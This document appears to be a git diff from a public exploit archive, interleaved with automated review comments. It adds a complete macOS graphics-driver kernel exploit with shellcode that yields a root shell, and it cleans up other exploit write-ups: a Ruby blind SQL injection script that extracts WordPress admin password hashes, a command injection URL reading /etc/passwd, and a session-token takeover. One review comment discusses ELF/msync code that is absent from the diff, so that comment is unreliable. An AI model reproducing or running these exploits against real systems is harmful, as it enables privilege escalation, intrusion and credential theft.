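Review bot: In the `@@ -156,17` hunk, `msync(NULL, 0, MS_SYNC)` does not refer to the mapping created earlier in the file, so it presumably flushes nothing and the comment above it ("Synchronize the ELF in file system with the previous memory mapped") is not what the call does; the mapping is a `MAP_SHARED` region starting at `header`, so the call should be `msync(header, sizeof *header, MS_SYNC)`. There is also no `munmap(header, ...)` before the `close(fd)` calls on either the success or the error path. In the `@@ -189,25` hunk, `read(fd, &header, sizeof(header))` only checks for `-1`; a short read leaves part of `header.e_ident` uninitialized before the magic/class/endianness checks, so comparing the return value against `sizeof(header)` would be the safer guard.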
diff --git a/platforms/multiple/webapps/31647.txt b/platforms/multiple/webapps/31647.txt index 7869f335d..a665ad074 100755 --- a/platforms/multiple/webapps/31647.txt +++ b/platforms/multiple/webapps/31647.txt @@ -12,13 +12,13 @@ Details: CA 2E Web Option (r8.1.2) and potentially others, is vulnerable to unauthenticated privilege escalation via a predictable session token. The POST parameter session token W2E_SSNID appears as follows: -W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE +W2E_SSNID=W90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE JuNX9GoVjCEbqIuKh6kFRvbzYnUxgQtONszJldyAar3LtTSwsmBLpdlPc5iDH4Zf75 However, this token is poorly validated, leading to -W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013 +W2E_SSNID=W90NIxGoSsN1023ZYW2E735182000013 being accepted as a valid session. By incrementing and decrementing the digits at the end of the value given above, it is @@ -27,7 +27,7 @@ part of the login page, and as such, can be manipulated by an unauthenticated attacker, giving them access to any valid session. Consequentially, it is possible to access the following page as such: -https://app.domain.co.uk/web2edoc/close.htm?SSNID=3DW90NIxGoSsN1023ZYW2E735182000026 +https://app.domain.co.uk/web2edoc/close.htm?SSNID=W90NIxGoSsN1023ZYW2E735182000026 Ending the session specified, which could lead to a denial of service condition. diff --git a/platforms/multiple/webapps/36930.txt b/platforms/multiple/webapps/36930.txt index 3148dd34c..950a8e3fb 100755 --- a/platforms/multiple/webapps/36930.txt +++ b/platforms/multiple/webapps/36930.txt @@ -3,7 +3,7 @@ # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ -# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 +# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 
@@ -37,10 +37,10 @@ Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] -Line 44: $result =3D $_POST; +Line 44: $result = $_POST; [...] -Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms -where form_id=3D"'.*$result['fm_form_id']*.'";'); +Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms +where form_id="'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept @@ -52,19 +52,19 @@ X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] -form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and -"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F +form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and +"a"="a&action=fm_form&fm_form_referer=%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the -formulary with fm_form_id=3D"1" and the JSON message received will be simil= +formulary with fm_form_id="1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* -","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= +","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} 
@@ -72,11 +72,11 @@ The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* -","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= +","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} -If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= +If we insert *1**" and substr(user(),1,1)="a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message diff --git a/platforms/osx/local/39675.c b/platforms/osx/local/39675.c new file mode 100755 index 000000000..4de293aa7 --- /dev/null +++ b/platforms/osx/local/39675.c 
@@ -0,0 +1,544 @@
+/*
+
+░▀█▀░█▀█░█░░░█▀█░█▀▀░░░█░█░█░█░█░░░█▀█░█▀▄░█▀▀░█░█░
+░░█░░█▀█░█░░░█░█░▀▀█░░░▀▄▀░█░█░█░░░█░█░█░█░█▀▀░▀▄▀░
+░░▀░░▀░▀░▀▀▀░▀▀▀░▀▀▀░░░░▀░░▀▀▀░▀▀▀░▀░▀░▀▀░░▀▀▀░░▀░░
+ T A L O S V U L N D E V
+
+Proof-of-Concept Exploit
+Advisory: http://www.talosintel.com/reports/TALOS-2016-0088/
+Snort rules: 37517, 37518
+CVE-2016-1743
+
+Author: Piotr Bania, Cisco Talos
+Target: Apple Intel HD 3000 Graphics driver
+Impact: Local Privilege Escalation (root)
+
+Tested Configuration:
+Apple Intel HD 3000 Graphics driver 10.0.0
+Darwin Kernel Version 15.2.0
+OSX 10.11.2
+
+Compilation:
+gcc TALOS-2016-0088_poc.c lsym.m -o TALOS-2016-0088_poc -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
+
+kudos:
+qwertyoruiop (i've grabbed the lsym thing from you)
+
+
+technical information (AppleIntelHD3000Graphics driver 10.0.0) :
+...
+__text:000000000001AA4E mov ecx, [rcx]
+__text:000000000001AA50 add ecx, ecx
+__text:000000000001AA52 sub eax, ecx
+__text:000000000001AA54 cmp rbx, rax
+__text:000000000001AA57 ja loc_1AC8C
+__text:000000000001AA5D mov [rbp+var_54], esi
+__text:000000000001AA60 mov rax, [rdi]
+__text:000000000001AA63 mov esi, 168h
+__text:000000000001AA68 call qword ptr [rax+980h] ; # WE CAN CONTROL THIS #
+
+
+Expected output:
+
+mac-mini:bug mini$ uname -a
+Darwin BLAs-Mac-mini 15.2.0 Darwin Kernel Version 15.2.0: Fri Nov 13 19:56:56 PST 2015; root:xnu-3248.20.55~2/RELEASE_X86_64 x86_64
+
+mac-mini:bug mini$ ./TALOS-2016-0088_poc
+----------------------------------------------------------------
+APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11
+by Piotr Bania / CISCO TALOS
+----------------------------------------------------------------
+
+
+Alloc: deallocating!
+Alloc: allocating 0x2000 (0x00000000 - 0x00002000)bytes
+Alloc: vm_allocate ok, now vm_protect ...
+Alloc: vm_allocate returned = 0 - addr = 0x00000000, vm_protect ok, filling
+Mapping the kernel
+MapKernel: kernel mapped
+Initializing service
+InitService: Trying: Gen6Accelerator
+InitService: service ok!
+Commencing stage 1
+Stage1: Copying the stage1 payload 0x00001000 - 0x00001071
+Stage1: Setting up the RIP to 0x00001000
+Stage1: Copying trigger data
+Stage1: Making stage1 call
+Stage1: leaked kernel address 0xffffff8021e00000
+Stage1: kernel address leaked, success!
+ResolveApi: using kernel addr 0xffffff8021e00000 (file base = 0xffffff8000200000)
+ResolveApi: _current_proc = 0xffffff8022437a60
+ResolveApi: _proc_ucred = 0xffffff80223a9af0
+ResolveApi: _posix_cred_get = 0xffffff802237e780
+ResolveApi: _chgproccnt = 0xffffff80223a8400
+Commencing stage 2
+Stage2: preparing the stage2 payload
+Stage2: Copying the stage2 payload 0x00001000 - 0x00001071
+Stage2: Setting up the RIP to 0x00001000
+Stage2: Copying trigger data
+Stage2: Making stage2 call
+Stage2: success, got root!
+Stage2: now executing shell
+sh-3.2# whoami
+root
+sh-3.2#
+
+*/
+
+
+#include "import.h"
+
+/**
+
+ defines
+
+**/
+
+#define MEM_SIZE 0x2000
+#define PAYLOAD_MEM_START 0x1000
+#define INIT_SIG 0x0210010100000008
+#define OFFSET_PAYLOAD_EXEC 0x980
+#define OFFSET_ROOM 64
+
+#define RESOLVE_SYMBOL_MY(map, name) lsym_find_symbol(map, name) - base + KernelAddr
+
+
+/**
+
+ stage 1 payload - get kernel address and put it to 0x1000
+
+ ; memory space for kernel address
+
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+
+ save_regs64
+
+
+ ; get msr entry
+ mov rcx, 0C0000082h ; lstar
+ rdmsr ; MSR[ecx] --> edx:eax
+ shl rdx, 32
+ or rax, rdx
+
+ ; find kernel addr - scan backwards
+MAX_KERNEL_SCAN_SIZE equ 10000h
+KERNEL_SIG equ 01000007FEEDFACFh
+PAGE_SIZE equ 1000h
+
+
+ mov rcx, MAX_KERNEL_SCAN_SIZE
+ and rax, not 0FFFFFh
+ xor rdx, rdx
+ mov r8, KERNEL_SIG
+
+
+scan_loop:
+ sub rax, PAGE_SIZE
+ dec rcx
+ jz scan_done
+
+ ; is sig correct?
+ cmp qword [rax], r8
+ jnz scan_loop
+
+ mov rdx, rax
+
+scan_done:
+
+ ; store the addr - rdx kernel addr, 0 if not found
+ lea rcx, [shell_start]
+ mov qword [rcx], rdx
+
+ load_regs64
+
+ xor rax, rax
+ xor r15, r15
+
+ ret
+
+
+
+**/
+
+unsigned char stage1[113] = {
+ 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55,
+ 0x41, 0x56, 0x41, 0x57, 0x48, 0xB9, 0x82, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x32,
+ 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x09, 0xD0, 0x48, 0xC7, 0xC1, 0x00, 0x00, 0x01, 0x00, 0x48, 0x25,
+ 0x00, 0x00, 0xF0, 0xFF, 0x48, 0x31, 0xD2, 0x49, 0xB8, 0xCF, 0xFA, 0xED, 0xFE, 0x07, 0x00, 0x00,
+ 0x01, 0x48, 0x2D, 0x00, 0x10, 0x00, 0x00, 0x48, 0xFF, 0xC9, 0x74, 0x08, 0x4C, 0x39, 0x00, 0x75,
+ 0xF0, 0x48, 0x89, 0xC2, 0x48, 0x8D, 0x0D, 0xA5, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x11, 0x41, 0x5F,
+ 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF,
+ 0xC3
+};
+
+
+/**
+
+ stage 2 payload - escalate
+
+ jmp over_api_table
+
+
+ api_current_proc dq 0
+ api_proc_ucred dq 0
+ api_posix_cred_get dq 0
+ api_chgproccnt dq 0
+
+
+
+ over_api_table:
+ save_regs64
+
+ mov rax, qword [api_current_proc]
+ call rax
+ mov rdi, rax ; rdi = cur_proc
+
+
+ ; system v abi - rdi first arg
+ mov rax, qword [api_proc_ucred]
+ call rax
+
+
+ ; rax = cur_ucred
+ mov rdi, rax
+ mov rax, qword [api_posix_cred_get]
+ call rax
+
+ ; rax = pcred
+ mov dword [rax], 0
+ mov dword [rax+8], 0
+
+ load_regs64
+
+ xor rax, rax
+ xor r15, r15
+
+ ret
+
+**/
+
+
+#define OFF_API_START 2
+#define OFF_API_CURRENT_PROC OFF_API_START
+#define OFF_API_PROC_UCRED OFF_API_CURRENT_PROC + 8
+#define OFF_API_POSIX_CRED_GET OFF_API_PROC_UCRED + 8
+#define OFF_API_CHGPROCCNT OFF_API_POSIX_CRED_GET + 8 // not used in this example
+
+
+unsigned char stage2[111] = {
+ 0xEB, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B,
+ 0x05, 0xCD, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC9, 0xFF, 0xFF,
+ 0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC5, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0xC7,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E,
+ 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF, 0xC3
+};
+
+
+
+/**
+
+ globals
+
+**/
+
+uint64_t mem;
+io_connect_t conn;
+
+uint64_t KernelAddr = 0;
+lsym_map_t* MappingKernel = 0;
+
+uint64_t api_current_proc = 0;
+uint64_t api_proc_ucred = 0;
+uint64_t api_posix_cred_get = 0;
+uint64_t api_chgproccnt = 0;
+
+
+
+
+/**
+
+ functions
+
+**/
+
+
+
+uint64_t Alloc(uint32_t addr, uint32_t sz)
+{
+ mach_error_t k_error;
+
+ printf("Alloc: deallocating! \n");
+ vm_deallocate(mach_task_self(), (vm_address_t) addr, sz);
+
+ printf("Alloc: allocating 0x%x (0x%08x - 0x%08x) bytes\n", sz, addr, addr+sz);
+ k_error = vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0);
+
+ if (k_error != KERN_SUCCESS)
+ {
+ printf("Alloc: vm_allocate() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
+ exit(-1);
+ }
+
+
+ printf("Alloc: vm_allocate ok, now vm_protect ...\n");
+
+ k_error = vm_protect(mach_task_self(), addr, sz, 0, 7); //rwx
+
+ if (k_error != KERN_SUCCESS)
+ {
+ printf("Alloc: vm_protect() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
+ exit(-1);
+ }
+
+ printf("Alloc: vm_allocate returned = %d - addr = 0x%08x, vm_protect ok, filling\n", k_error, addr);
+
+ while(sz--) *(char*)(addr+sz)=0;
+ return addr;
+}
+
+
+int MapKernel(void)
+{
+
+ MappingKernel = lsym_map_file("/mach_kernel");
+ if (!MappingKernel || !MappingKernel->map)
+ {
+ MappingKernel = lsym_map_file("/System/Library/Kernels/kernel");
+ }
+
+ if (!MappingKernel || !MappingKernel->map)
+ {
+ printf("MapKernel: unable to map kernel, quiting \n");
+ return -1;
+ }
+
+
+ printf("MapKernel: kernel mapped \n");
+ return 1;
+}
+
+
+
+int ResolveApi(void)
+{
+
+
+ uint64_t base = lsym_kernel_base(MappingKernel);
+
+ api_current_proc = RESOLVE_SYMBOL_MY(MappingKernel, "_current_proc");
+ api_proc_ucred = RESOLVE_SYMBOL_MY(MappingKernel, "_proc_ucred");
+ api_posix_cred_get = RESOLVE_SYMBOL_MY(MappingKernel, "_posix_cred_get");
+ api_chgproccnt = RESOLVE_SYMBOL_MY(MappingKernel, "_chgproccnt");
+
+ printf("ResolveApi: using kernel addr 0x%016llx (file base = 0x%016llx) \n", KernelAddr, base);
+ printf("ResolveApi: _current_proc = 0x%016llx \n", api_current_proc);
+ printf("ResolveApi: _proc_ucred = 0x%016llx \n", api_proc_ucred);
+ printf("ResolveApi: _posix_cred_get = 0x%016llx \n", api_posix_cred_get);
+ printf("ResolveApi: _chgproccnt = 0x%016llx \n", api_chgproccnt);
+
+ return 1;
+
+}
+
+
+
+
+int InitService(char *IoServiceName)
+{
+ int type;
+ io_service_t service;
+ CFMutableDictionaryRef matching;
+ io_iterator_t iterator;
+
+ printf("InitService: Trying: %s \n", IoServiceName);
+
+ matching = IOServiceMatching(IoServiceName);
+
+ if( !matching)
+ {
+ printf("Initservice: IOServiceMatching() failed \n");
+ return -1;
+ }
+
+ if (IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator) != KERN_SUCCESS)
+ {
+ printf("InitService: IOServiceGetMatchingServices failed \n");
+ return -1;
+ }
+
+
+ service = IOIteratorNext(iterator);
+ if (service == IO_OBJECT_NULL)
+ {
+ printf("InitService: IOIteratorNext failed \n");
+ return -1;
+ }
+
+
+ type = 0;
+ conn = MACH_PORT_NULL;
+ if (IOServiceOpen(service, mach_task_self(), 5, &conn) != KERN_SUCCESS)
+ {
+ printf("InitService: IOServiceOpen failed! \n");
+ return -1;
+ }
+
+ printf("InitService: service ok! \n");
+ return 1;
+}
+
+
+
+int Stage1(void)
+{
+ unsigned char *p;
+ unsigned char *p_ptr;
+
+ kern_return_t k_error;
+
+ char UselessStruct[4096];
+ size_t UselessStructSize = 0x14;
+
+
+ p = (unsigned char*)mem;
+ p_ptr = p + OFFSET_ROOM;
+
+
+
+ printf("Stage1: Copying the stage1 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
+ memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage1, sizeof(stage1));
+
+ printf("Stage1: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
+ *(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
+
+
+ printf("Stage1: Copying trigger data \n");
+ *(uint64_t*)p_ptr = INIT_SIG;
+
+ printf("Stage1: Making stage1 call\n");
+ k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
+
+ KernelAddr = *(uint64_t*)PAYLOAD_MEM_START;
+ printf("Stage1: leaked kernel address 0x%016llx \n", KernelAddr);
+
+ if ((KernelAddr == 0) || (KernelAddr == 0x90909090))
+ {
+ printf("Stage1: fatal kernel address is wrong, exiting \n");
+ return -1;
+ }
+
+ printf("Stage1: kernel address leaked, success! \n");
+ return 1;
+}
+
+
+int Stage2(void)
+{
+ int i;
+ unsigned char *p;
+ unsigned char *p_ptr;
+
+ kern_return_t k_error;
+
+ char UselessStruct[4096];
+ size_t UselessStructSize = 0x14;
+
+
+ p = (unsigned char*)mem;
+ p_ptr = p + OFFSET_ROOM;
+
+
+ printf("Stage2: preparing the stage2 payload \n");
+
+ unsigned char *t = (unsigned char*)&stage2;
+ *(uint64_t*)(t + OFF_API_CURRENT_PROC) = api_current_proc;
+ *(uint64_t*)(t + OFF_API_PROC_UCRED) = api_proc_ucred;
+ *(uint64_t*)(t + OFF_API_POSIX_CRED_GET) = api_posix_cred_get;
+ *(uint64_t*)(t + OFF_API_CHGPROCCNT) = api_chgproccnt;
+
+
+ printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
+ memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2));
+
+ printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
+ *(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
+
+
+ printf("Stage2: Copying trigger data \n");
+ *(uint64_t*)p_ptr = INIT_SIG;
+
+
+ printf("Stage2: Making stage2 call\n");
+ k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
+
+
+ setuid(0);
+ if (getuid() == 0)
+ {
+
+ printf("Stage2: success, got root! \n");
+ printf("Stage2: now executing shell \n");
+
+ system("/bin/sh");
+ exit(0);
+ }
+
+
+ printf("Stage2: failed! \n");
+ return -1;
+
+}
+
+
+
+
+int main(void)
+{
+ printf(" ---------------------------------------------------------------- \n");
+ printf(" APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11 \n");
+ printf(" by Piotr Bania / CISCO TALOS \n");
+ printf(" ---------------------------------------------------------------- \n\n\n");
+
+
+ IOServiceClose(0);
+ IOServiceOpen(0, 0, 0, 0);
+
+ // if this fails and we are done
+ mem = Alloc(0, MEM_SIZE);
+
+
+ printf("Mapping the kernel \n");
+
+ if (MapKernel() == -1)
+ return -1;
+
+ printf("Initializing service \n");
+
+ if (InitService("Gen6Accelerator") == -1)
+ return -1;
+
+ printf("Commencing stage 1 \n");
+
+ if (Stage1() == -1)
+ return -1;
+
+ if (ResolveApi() == -1)
+ return -1;
+
+ printf("Commencing stage 2 \n");
+
+ Stage2();
+
+
+ return 1;
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/23798.txt b/platforms/php/webapps/23798.txt
index 46c4e6662..5700b6aca 100755
--- a/platforms/php/webapps/23798.txt
+++ b/platforms/php/webapps/23798.txt
@@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/9831/info
 The Confixx PERL debugging utility functionality has been reported to be prone to a remote command execution vulnerability. The issue is reported to occur when a command sequence is appended to a HTTP request for a PERL script resource, the command sequence must contain a prefixed ';' semi-colon character. When this request is processed, the command sequence will be reportedly executed with the privileges of the process that invokes the Confixx PERL debugging utility. ; /bin/cat location_of_Confixx_config_file
-http://www.example.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd
\ No newline at end of file
+http://www.example.com/user/tools_cgicheck2.php?dir=&file=%20./x%20|/bin/cat%20/etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/24868.rb b/platforms/php/webapps/24868.rb
index aa4c6ec6b..d7a0560ed 100755
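Review bot: The Stage2 progress message on the new side takes its end address from the wrong array, `printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));`, a copy-paste slip from Stage1; the memcpy on the next line correctly uses `sizeof(stage2)`, so only the log is wrong, but the two arrays are declared with different lengths (113 and 111) and the printed range will not match what was actually written. Change it to `PAYLOAD_MEM_START + sizeof(stage2)`. The listing is also not self-contained as committed: it includes `import.h` and the compile line in its header references `lsym.m`, neither of which this commit adds, so a reader of the archive cannot tell what those provide; a one-line comment next to the include, such as `/* import.h / lsym.m are not part of this listing; see the kudos line in the header for their origin */`, would save the next maintainer a search.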
--- a/platforms/php/webapps/24868.rb +++ b/platforms/php/webapps/24868.rb @@ -5,15 +5,14 @@ # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/ # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip # Version: 1.0 -# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patc= -h (cli) +# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) ############## # Description: ############## # The "order" and "orderby" parameter is vulnerable for SQL Injection -# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din= -ic_faq&orderby=3D +# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=in= +ic_faq&orderby= # PoC take some time to finish (15min on my Testsystem). # I could speed it up with Multithreading but I'm to lazy right now @@ -22,22 +21,22 @@ ic_faq&orderby=3D ################################### # # function prepare_items() { -# $this->_column_headers =3D array($this->_columns, $this->_hidden_columns= +# $this->_column_headers = array($this->_columns, $this->_hidden_columns= , $this->_sortable_columns); -# $sort_order =3D isset($_GET['order']) ? $_GET['order'] : "ASC"; -# $orderby_column =3D isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby= +# $sort_order = isset($_GET['order']) ? $_GET['order'] : "ASC"; +# $orderby_column = isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby= ']} {$sort_order}" : false; # # global $wpdb; # if (is_array($this->_sql)) { -# if ($orderby_column =3D=3D false) { -# $data =3D $this->_sql; +# if ($orderby_column == false) { +# $data = $this->_sql; # } else { -# $data =3D $this->_sql; +# $data = $this->_sql; # usort($data, array(&$this, 'usort_reorder')); # } # } else { -# $data =3D $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A= +# $data = $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A= ); # } ###########################################################################= 
@@ -51,47 +50,47 @@ ic_faq&orderby=3D require "net/http" require "uri" -$target =3D "" # EDIT ME # -$cookie =3D "" # EDIT ME # authenticated user session +$target = "" # EDIT ME # +$cookie = "" # EDIT ME # authenticated user session # Example: -#$target =3D "http://127.0.0.1:9001/wordpress/" -#$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin%7C13640405= -45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor%3Dhtml; wp-se= -ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5= -=3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony%40bau= -er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp%3A%2F%2Fs= -ucker.de; wordpress_test_cookie=3DWP+Cookie+check; wordpress_logged_in_a6a5= -d84619ae3f833460b386c064b9e5=3Dadmin%7C1364040545%7Cd7053b96adaa95745023b91= -694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage= -=3D1" +#$target = "http://127.0.0.1:9001/wordpress/" +#$cookie = "wordpress_a6a5d84619ae3f833460b386c064b9e5=admin%7C13640405= +45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=editor%3Dhtml; wp-se= +ttings-time-1=1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5= +=tony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=tony%40bau= +er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=http%3A%2F%2Fs= +ucker.de; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a6a5= +d84619ae3f833460b386c064b9e5=admin%7C1364040545%7Cd7053b96adaa95745023b91= +694bf30ef; PHPSESSID=1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage= +=1" if $target.eql?("") or $cookie.eql?("") puts "\n[!]\tPlease set $target and $cookie variable\n" raise end -$chars =3D ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a -$hash =3D "$P$" -$i =3D 0 # chars index -$j =3D 4 # hash index +$chars = ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a +$hash = "$P$" +$i = 0 # chars index +$j = 4 # hash index def sqli_send() - sqli =3D URI.escape("(CASE WHEN 
((SELECT ASCII(SUBSTRING(user_pass, #{$= -j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*= + sqli = URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$= +j}, 1)) FROM wp_users WHERE id = 1) = #{$chars[$i].ord}) THEN 1 ELSE 1*= (SELECT table_name FROM information_schema.tables)END) --") - uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby= -=3D#{sqli}") - http =3D Net::HTTP.new(uri.host, uri.port) + uri = URI.parse("#{$target}wp-admin/admin.php?page=inic_faq&orderby= +=#{sqli}") + http = Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stderr) - request =3D Net::HTTP::Get.new(uri.request_uri) - request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;= + request = Net::HTTP::Get.new(uri.request_uri) + request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;= rv:19.0) Gecko/20100101 Firefox/19.0" - request["Cookie"] =3D $cookie - resp =3D http.request(request) - if( resp.code !=3D "200" ) - puts "something is wrong response =3D #{resp.code}" + request["Cookie"] = $cookie + resp = http.request(request) + if( resp.code != "200" ) + puts "something is wrong response = #{resp.code}" raise end # In WordPress default settings there will no SQL error displayed @@ -101,17 +100,17 @@ j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*= end def print_status() - output =3D "HASH: #{$hash} try #{$chars[$i]}" + output = "HASH: #{$hash} try #{$chars[$i]}" print "\b"*output.length + output end while( $hash.length < 34 ) if( !sqli_send() ) - $hash +=3D $chars[$i] - $j +=3D 1 - $i =3D 0 + $hash += $chars[$i] + $j += 1 + $i = 0 else - $i +=3D 1 + $i += 1 end print_status() end diff --git a/platforms/php/webapps/26866.txt b/platforms/php/webapps/26866.txt index 593046e77..abcb4c687 100755 --- a/platforms/php/webapps/26866.txt +++ b/platforms/php/webapps/26866.txt 
@@ -4,7 +4,7 @@ Round Cube will reportedly reveal its installation path in an error message outp Requesting this link: -http://xxxx.com/roundcube/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=3Dma%60il +http://xxxx.com/roundcube/?_auth=cf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=ma%60il Caused this error message: diff --git a/platforms/php/webapps/39676.txt b/platforms/php/webapps/39676.txt new file mode 100755 index 000000000..7bcc3aca3 --- /dev/null +++ b/platforms/php/webapps/39676.txt 
